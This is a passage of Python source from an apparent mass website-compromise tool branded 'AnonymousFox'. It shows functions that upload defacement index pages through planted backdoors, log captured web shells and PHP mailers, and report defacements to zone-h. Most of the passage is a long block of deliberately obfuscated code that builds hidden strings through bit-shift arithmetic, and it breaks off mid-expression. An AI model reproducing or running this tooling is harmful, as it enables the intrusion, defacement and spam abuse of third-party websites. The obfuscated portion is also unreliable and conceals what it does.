open('Results/Leaf_PHP_Mailers.txt', 'a').write('{}\n'.format(file_path))
else :
print(' {}[+] Saved in {}Results/Shells.txt'.format(fg, fr))
open('Results/Shells.txt', 'a').write('{}\n'.format(file_path))
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def massUploadIndex1(backdor, file, nameF, z, attacker) :
try :
print(' {}[*] Upload Index ..... {}(Waiting)'.format(fw, fr))
post = {'up': 'up'}
fileup = {'file': (nameF, file_get_contents_Fox(file))}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=45)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=60)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
file_path = re.findall(re.compile('<yourfile>(.*)</yourfile>'), upFile)[0]
if ('https://' in backdor):
file_path = file_path.replace('http://', 'https://')
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, file_path))
open('Results/indexS.txt', 'a').write('{}\n'.format(file_path))
if(z == 1): zoneH(file_path, attacker)
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def massUploadIndex2(backdor, file, z, attacker) :
try :
print(' {}[*] Upload Index ..... {}(Waiting)'.format(fw, fr))
filedata = {'getindex':'AnonymousFox', 'index': file_get_contents_Fox(file)}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, headers=headers, timeout=45)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, headers=headers, timeout=60)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
file_path = re.findall(re.compile('<yourindex>(.*)</yourindex>'), upFile)[0]
if ('https://' in backdor):
file_path = file_path.replace('http://', 'https://')
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, file_path))
open('Results/indexS.txt', 'a').write('{}\n'.format(file_path))
if (z == 1): zoneH(file_path, attacker)
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
_hlsclcpzwvcu=((()==[])+(()==[]));__aflplkezjikd=(_hlsclcpzwvcu**_hlsclcpzwvcu);___yxzqdtmchnrw=((__aflplkezjikd<<__aflplkezjikd));____fsramejesdme=((__aflplkezjikd<<___yxzqdtmchnrw));_____tajgegigotbw=((__aflplkezjikd<<____fsramejesdme));______mwfdcrswdvcf=((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)));_______ecvjmoevghfv=str("".join(chr(__RSV) for __RSV in [((__aflplkezjikd<<__aflplkezjikd)+(___yxzqdtmchnrw<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(____fsramejesdme<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(_____tajgegigotbw<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+(((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(______mwfdcrswdvcf<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));________ygduyrnxgztb=str("".join(chr(__RSV) for __RSV in 
[((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_________cizspthecocr=str("".join(chr(__RSV) for __RSV in 
[((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu*
*_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(
(((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hls
clcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdm
e))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclc
pzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme
))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((
__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwv